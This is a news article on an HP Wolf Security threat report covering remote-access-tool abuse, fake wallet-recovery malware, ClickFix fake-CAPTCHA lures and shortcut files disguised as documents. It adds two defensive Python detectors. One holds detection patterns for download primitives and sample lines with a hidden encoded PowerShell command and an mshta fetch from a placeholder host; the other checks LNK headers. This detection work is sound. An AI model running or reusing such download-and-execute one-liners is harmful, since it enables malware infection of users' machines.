Cybercriminals are using legitimate remote access software, fake cryptocurrency recovery tools, and malware disguised as common files to gain control of corporate endpoints, according to the latest HP Wolf Security Threat Insights Report.
Hackers are increasingly relying on trusted software, realistic social engineering tactics, and familiar workflows to bypass traditional security controls and establish persistent access to corporate environments. These findings are based on telemetry collected from HP Wolf Security customers during the first quarter of 2026, analyzing malware campaigns and attack techniques observed across millions of protected endpoints.
HP researchers identified campaigns that leveraged LogMeIn and ScreenConnect, applications commonly used by IT departments for technical support and device administration. Attackers distributed these tools through phishing emails themed around tax year-end activities and through fraudulent desktop application downloads hosted on fake websites, including counterfeit dating platforms.
Once installed, the software provided threat actors with full control over victim devices while appearing indistinguishable from legitimate IT operations. Because these applications are widely used in enterprise environments, malicious activity can blend with routine administrative tasks, reducing the likelihood of detection.
“What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” says Patrick Schläpfer, Principal Threat Researcher, HP Security Lab. “By combining trusted software with social engineering techniques linked to events such as tax year-end activities, it becomes increasingly difficult to distinguish what is legitimate from what is malicious.”
The findings emerge as organizations continue expanding hybrid work environments and remote administration capabilities. Remote access applications have become essential for IT operations, but their widespread adoption also creates opportunities for attackers seeking to exploit user trust and established workflows.
Other Key Findings
Beyond remote access software, HP researchers documented campaigns targeting cryptocurrency users through fraudulent wallet recovery utilities. The tools claimed to help individuals recover lost cryptocurrency wallets but instead harvested credentials, wallet information, and system data.
According to HP Threat Research, the malware was distributed through code-sharing platforms and media download websites. Researchers observed that many of the scripts contained large numbers of emojis and coding patterns that suggest the use of AI-assisted development techniques, often referred to as “vibe coding.”
Once executed, the malicious tools collected credentials, wallet information, and device data before packaging the information into compressed archive files for exfiltration. The findings indicate that attackers continue adapting development methods to accelerate malware creation while targeting users seeking access to digital assets.
ClickFix Campaigns Exploit Fake CAPTCHA Prompts
The report also identified a growing use of “ClickFix campaigns,” which disguise malware as audio files. Victims are directed to fake websites featuring realistic CAPTCHA verification prompts. After completing the verification process, users unknowingly execute malicious commands that install malware in the background.
HP Wolf Security researchers observed campaigns that would have delivered Amatera Stealer, malware designed to collect credentials, browser cookies, and cryptocurrency wallet information. Follow-on payloads included adware and NetSupport, a remote administration tool that provides attackers with ongoing access to compromised devices.
The use of CAPTCHA-based delivery mechanisms reflects a broader trend in cybercrime. According to the HP report, attackers increasingly leverage familiar online interactions to lower suspicion and encourage users to complete actions that facilitate infection. By embedding malicious activity within expected workflows, threat actors reduce the effectiveness of traditional warning signs associated with malware attacks.
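ClickFix lures end with the victim running a command the page hands them, and in the commonly documented variant that command is pasted into the Windows Run dialog, so the interpreter is spawned directly by explorer.exe rather than by a browser or document. The detector below is an added example written for this article, not code from HP Wolf Security or the report; it assumes that Run-dialog delivery path, and the telemetry lines it scans are constructed samples in a simplified, hypothetical `key="value"` format rather than real logs.

```python
"""Flag ClickFix-style command execution in process-creation telemetry.

Added example (not from the HP report). Assumption: the pasted command is run
from the Windows Run dialog, so the parent process is explorer.exe. Sample
events are constructed, not captured telemetry.
"""
import re
from dataclasses import dataclass, field

# Interpreters the pasted one-liner typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits common to such one-liners, each paired with the reason
# string reported when it matches.
TRAITS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
     "base64-encoded command"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|certutil)\b", re.I),
     "remote download primitive"),
    (re.compile(r"\bmshta\s+https?://", re.I), "HTA launched from a URL"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
]


@dataclass
class Finding:
    image: str
    cmdline: str
    reasons: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Parse one constructed 'key="value"' telemetry line into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict):
    """Return a Finding when the event matches the ClickFix pattern, else None."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent", ""))
    if image not in INTERPRETERS or parent != "explorer.exe":
        return None
    cmdline = event.get("cmdline", "")
    reasons = [why for pattern, why in TRAITS if pattern.search(cmdline)]
    if not reasons:
        return None  # an interpreter started from the shell is normal on its own
    reasons.insert(0, "interpreter spawned by explorer.exe (Run dialog)")
    return Finding(image, cmdline, reasons)


def scan(lines):
    """Run evaluate() over raw telemetry lines and keep the hits."""
    return [f for f in (evaluate(parse_event(l)) for l in lines) if f]


# Constructed sample telemetry (hypothetical format, not real data).
SAMPLE_EVENTS = [
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell -w hidden -ec SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\mshta.exe" cmdline="mshta https://captcha-check.invalid/verify.hta"',
    r'parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmdline="powershell Get-Process"',
    r'parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\cmd.exe" cmdline="cmd /c ipconfig /all"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.image, "->", "; ".join(f.reasons))
```

The rule deliberately requires both signals: explorer.exe as parent narrows the hunt to commands a user typed or pasted, and the command-line traits separate a lure's one-liner from an administrator opening a console. The third sample event (a plain `Get-Process` from the shell) is therefore not flagged, which keeps the rule usable on real endpoints.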
Additional campaigns identified during the quarter included a PDF-based GuLoader operation that used CAPTCHA prompts to evade detection, Excel macro attacks delivering Loda RAT malware to Spanish-speaking users, and Global Group ransomware distributed through Windows shortcut files disguised as Microsoft Word documents.
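A shortcut disguised as a Word document works because Explorer hides the `.lnk` extension, so `Invoice.docx.lnk` displays as `Invoice.docx`. The check below, an added example not taken from the report, identifies a file by its shell-link header (the fixed 0x4C header size and ShellLink CLSID that every `.lnk` file begins with) rather than by its name, and then flags names that advertise a document extension. The sample files are constructed in memory.

```python
"""Spot Windows shortcut files posing as documents by checking the LNK header.

Added example (not from the HP report). Sample files below are constructed.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# ShellLink CLSID 00021401-0000-0000-C000-000000000046 as it is laid out on disk.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
DOCUMENT_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt")


def is_lnk(data: bytes) -> bool:
    """True when the bytes start with a shell-link header, whatever the name says."""
    return (len(data) >= 20
            and struct.unpack_from("<I", data)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def disguised_shortcut(filename: str, data: bytes):
    """Return a reason string if a shortcut masquerades as a document, else None."""
    if not is_lnk(data):
        return None
    name = filename.lower()
    stem = name[:-4] if name.endswith(".lnk") else name
    if stem.endswith(DOCUMENT_EXTS):
        return f"shortcut carrying a document extension in its name: {filename}"
    if not name.endswith(".lnk"):
        return f"shortcut without a .lnk extension: {filename}"
    return None


def triage(files: dict) -> dict:
    """Map file name -> reason for every disguised shortcut in a name->bytes dict."""
    hits = {}
    for name, data in files.items():
        why = disguised_shortcut(name, data)
        if why:
            hits[name] = why
    return hits


# Constructed samples: a minimal LNK header padded to its 0x4C bytes, and a
# genuine OOXML document, which is a ZIP container starting with "PK".
FAKE_LNK = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + bytes(LNK_HEADER_SIZE - 20)
SAMPLE_FILES = {
    "Invoice.docx.lnk": FAKE_LNK,   # what the lure looks like in a mailbox
    "Contract.pdf.lnk": FAKE_LNK,
    "Report.docx": b"PK\x03\x04" + bytes(60),
    "Tools.lnk": FAKE_LNK,          # an honest shortcut, not flagged
}

if __name__ == "__main__":
    for name, why in triage(SAMPLE_FILES).items():
        print(f"{name}: {why}")
```

Because the verdict comes from the header bytes, renaming the file or swapping its icon does not defeat the check; the same logic applies to mail-gateway and download-folder scans where the file name is the only thing the user ever sees.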
Malware Delivery Trends Reveal Persistent Evasion Tactics
The report also provides insight into broader malware distribution trends observed by HP Wolf Security during the first quarter. Executable files represented the most common malware delivery method, accounting for 39% of cases, followed by compressed archive files at 38% and PDF documents at 10%.
Researchers also recorded a 2% increase in malware delivered through PDF files. These campaigns frequently used legal documents, court notifications, and bonus-related communications as lures designed to create urgency and encourage user interaction.
According to HP Wolf Security telemetry, at least 11% of email threats identified by HP Sure Click bypassed one or more email security scanners before being contained within isolated environments.
“These attacks do not look like intrusions; they look like everyday activity. They blend into normal IT operations and avoid the warning signs traditionally associated with malware,” says Alex Holland, Principal Threat Researcher, HP Security Lab. “Organizations should limit unnecessary privileges, control software installation, and isolate high-risk activities such as downloads, unknown links, and email attachments.”
As attackers continue leveraging trusted applications and increasingly convincing social engineering tactics, the findings suggest that enterprise security strategies may need to place greater emphasis on isolation, privilege management, and application control.
© 2025 Mexicobusiness.News. A Mexico Business Company. All Rights Reserved.